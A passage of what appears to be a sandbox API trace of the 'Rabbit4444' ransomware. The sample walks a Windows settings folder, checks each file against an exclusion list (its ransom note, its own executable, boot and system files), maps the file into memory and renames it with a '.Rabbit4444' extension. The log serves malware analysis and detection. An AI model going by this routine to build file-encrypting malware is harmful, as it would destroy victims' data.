"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_classic_{e2e2f6cf-9d1a-4004-8999-8ab81010b5ac}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.285] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.285] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14759576677) returned 1 [0056.285] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1058) returned 1 [0056.285] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.285] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0056.285] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0056.286] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0056.287] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.287] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.287] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0056.287] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0056.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.287] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14759821102) returned 1 [0056.288] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.288] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0056.288] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.288] CloseHandle (hObject=0x298) returned 1 [0056.288] CloseHandle (hObject=0x278) returned 1 [0056.288] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms.Rabbit4444") returned 196 [0056.288] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_classic_{e2e2f6cf-9d1a-4004-8999-8ab81010b5ac}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_classic_{e2e2f6cf-9d1a-4004-8999-8ab81010b5ac}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.289] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef20b4d4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xef20b4d4, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_Proxy_Automatic_Config_Group.settingcontent-ms", cAlternateFileName="AAA_PR~1.SET")) returned 1 [0056.289] lstrcmpiW (lpString1="AAA_Proxy_Automatic_Config_Group.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.289] lstrcmpiW (lpString1="AAA_Proxy_Automatic_Config_Group.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.289] lstrcmpiW (lpString1="AAA_Proxy_Automatic_Config_Group.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.289] lstrcmpiW (lpString1="AAA_Proxy_Automatic_Config_Group.settingcontent-ms", lpString2=".") returned 1 [0056.289] lstrcmpiW (lpString1="AAA_Proxy_Automatic_Config_Group.settingcontent-ms", lpString2="..") returned 1 [0056.289] lstrcmpiW (lpString1="AAA_Proxy_Automatic_Config_Group.settingcontent-ms", lpString2="windows") returned -1 [0056.289] lstrcmpiW (lpString1="AAA_Proxy_Automatic_Config_Group.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.289] lstrcmpiW (lpString1="AAA_Proxy_Automatic_Config_Group.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.289] lstrcmpiW (lpString1="AAA_Proxy_Automatic_Config_Group.settingcontent-ms", lpString2="boot") returned -1 [0056.289] lstrcmpiW (lpString1="AAA_Proxy_Automatic_Config_Group.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.289] lstrcmpiW (lpString1="AAA_Proxy_Automatic_Config_Group.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.289] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_Proxy_Automatic_Config_Group.settingcontent-ms" | out: lpString1="AAA_Proxy_Automatic_Config_Group.settingcontent-ms") returned="AAA_Proxy_Automatic_Config_Group.settingcontent-ms" [0056.289] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_Proxy_Automatic_Config_Group.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.290] lstrlenW (lpString="AAA_Proxy_Automatic_Config_Group.settingcontent-ms") returned 50 [0056.290] lstrlenW (lpString="Rabbit4444") returned 10 [0056.290] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.290] lstrlenW (lpString=".dll") returned 4 [0056.290] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.290] lstrlenW (lpString=".lnk") returned 4 [0056.290] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.290] lstrlenW (lpString=".ini") returned 4 [0056.290] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.290] lstrlenW (lpString=".sys") returned 4 [0056.290] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.290] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_Proxy_Automatic_Config_Group.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_proxy_automatic_config_group.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.290] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.290] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14760113544) returned 1 [0056.290] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1138) returned 1 [0056.290] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0056.291] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0056.291] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x780, lpName=0x0) returned 0x298 [0056.292] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x780) returned 0x70000 [0056.292] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.292] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.292] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.292] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0056.292] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.293] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0056.293] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.293] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.293] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14760359549) returned 1 [0056.293] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0056.293] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0056.293] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.293] CloseHandle (hObject=0x298) returned 1 [0056.293] CloseHandle (hObject=0x278) returned 1 [0056.293] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_Proxy_Automatic_Config_Group.settingcontent-ms.Rabbit4444") returned 178 [0056.293] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_Proxy_Automatic_Config_Group.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_proxy_automatic_config_group.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_Proxy_Automatic_Config_Group.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_proxy_automatic_config_group.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.294] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefafc22a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xefafc22a, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x23884dd1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupAppSizesList.settingcontent-ms", cAlternateFileName="AAA_SE~1.SET")) returned 1 [0056.294] lstrcmpiW (lpString1="AAA_SettingsGroupAppSizesList.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.294] lstrcmpiW (lpString1="AAA_SettingsGroupAppSizesList.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.294] lstrcmpiW (lpString1="AAA_SettingsGroupAppSizesList.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.294] lstrcmpiW (lpString1="AAA_SettingsGroupAppSizesList.settingcontent-ms", lpString2=".") returned 1 [0056.294] lstrcmpiW (lpString1="AAA_SettingsGroupAppSizesList.settingcontent-ms", lpString2="..") returned 1 [0056.294] lstrcmpiW (lpString1="AAA_SettingsGroupAppSizesList.settingcontent-ms", lpString2="windows") returned -1 [0056.294] lstrcmpiW (lpString1="AAA_SettingsGroupAppSizesList.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.294] lstrcmpiW (lpString1="AAA_SettingsGroupAppSizesList.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.294] lstrcmpiW (lpString1="AAA_SettingsGroupAppSizesList.settingcontent-ms", lpString2="boot") returned -1 [0056.294] lstrcmpiW (lpString1="AAA_SettingsGroupAppSizesList.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.294] lstrcmpiW (lpString1="AAA_SettingsGroupAppSizesList.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.294] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupAppSizesList.settingcontent-ms" | out: lpString1="AAA_SettingsGroupAppSizesList.settingcontent-ms") returned="AAA_SettingsGroupAppSizesList.settingcontent-ms" [0056.294] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupAppSizesList.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.296] lstrlenW (lpString="AAA_SettingsGroupAppSizesList.settingcontent-ms") returned 47 [0056.296] lstrlenW (lpString="Rabbit4444") returned 10 [0056.296] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.296] lstrlenW (lpString=".dll") returned 4 [0056.296] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.296] lstrlenW (lpString=".lnk") returned 4 [0056.296] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.296] lstrlenW (lpString=".ini") returned 4 [0056.296] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.296] lstrlenW (lpString=".sys") returned 4 [0056.296] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.296] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupAppSizesList.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupappsizeslist.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.296] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.296] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14760697500) returned 1 [0056.296] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1120) returned 1 [0056.296] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0056.296] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0056.296] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x298 [0056.297] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x70000 [0056.298] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.298] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0056.298] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.298] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.298] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.299] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.299] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.299] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0056.299] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14760940080) returned 1 [0056.299] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0056.299] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0056.299] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.299] CloseHandle (hObject=0x298) returned 1 [0056.299] CloseHandle (hObject=0x278) returned 1 [0056.299] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupAppSizesList.settingcontent-ms.Rabbit4444") returned 175 [0056.299] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupAppSizesList.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupappsizeslist.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupAppSizesList.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupappsizeslist.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.300] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefcc5f8a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xefcc5f8a, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupAutoplayDefaults.settingcontent-ms", cAlternateFileName="AAA_SE~2.SET")) returned 1 [0056.300] lstrcmpiW (lpString1="AAA_SettingsGroupAutoplayDefaults.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.300] lstrcmpiW (lpString1="AAA_SettingsGroupAutoplayDefaults.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.300] lstrcmpiW (lpString1="AAA_SettingsGroupAutoplayDefaults.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.300] lstrcmpiW (lpString1="AAA_SettingsGroupAutoplayDefaults.settingcontent-ms", lpString2=".") returned 1 [0056.300] lstrcmpiW (lpString1="AAA_SettingsGroupAutoplayDefaults.settingcontent-ms", lpString2="..") returned 1 [0056.300] lstrcmpiW (lpString1="AAA_SettingsGroupAutoplayDefaults.settingcontent-ms", lpString2="windows") returned -1 [0056.300] lstrcmpiW (lpString1="AAA_SettingsGroupAutoplayDefaults.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.300] lstrcmpiW (lpString1="AAA_SettingsGroupAutoplayDefaults.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.300] lstrcmpiW (lpString1="AAA_SettingsGroupAutoplayDefaults.settingcontent-ms", lpString2="boot") returned -1 [0056.300] lstrcmpiW (lpString1="AAA_SettingsGroupAutoplayDefaults.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.300] lstrcmpiW (lpString1="AAA_SettingsGroupAutoplayDefaults.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.300] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupAutoplayDefaults.settingcontent-ms" | out: lpString1="AAA_SettingsGroupAutoplayDefaults.settingcontent-ms") returned="AAA_SettingsGroupAutoplayDefaults.settingcontent-ms" [0056.300] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.301] lstrlenW (lpString="AAA_SettingsGroupAutoplayDefaults.settingcontent-ms") returned 51 [0056.301] lstrlenW (lpString="Rabbit4444") returned 10 [0056.301] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.301] lstrlenW (lpString=".dll") returned 4 [0056.301] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.301] lstrlenW (lpString=".lnk") returned 4 [0056.301] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.301] lstrlenW (lpString=".ini") returned 4 [0056.301] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.301] lstrlenW (lpString=".sys") returned 4 [0056.301] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.301] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupautoplaydefaults.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.301] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.301] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14761191439) returned 1 [0056.301] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1147) returned 1 [0056.301] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0056.301] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0056.301] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x780, lpName=0x0) returned 0x298 [0056.302] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x780) returned 0x70000 [0056.303] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.303] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0056.303] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.303] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.303] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.303] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.303] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.303] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0056.304] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14761428407) returned 1 [0056.304] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0056.304] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0056.304] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.304] CloseHandle (hObject=0x298) returned 1 [0056.304] CloseHandle (hObject=0x278) returned 1 [0056.304] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms.Rabbit4444") returned 179 [0056.304] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupautoplaydefaults.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupautoplaydefaults.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.305] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefdf71b6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xefdf71b6, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4a9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms", cAlternateFileName="AAA_SE~3.SET")) returned 1 [0056.305] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.305] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.305] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.305] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms", lpString2=".") returned 1 [0056.305] lstrcmpiW (lpString1="AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms", lpString2="..") returned 1 [0056.305] lstrcmpiW 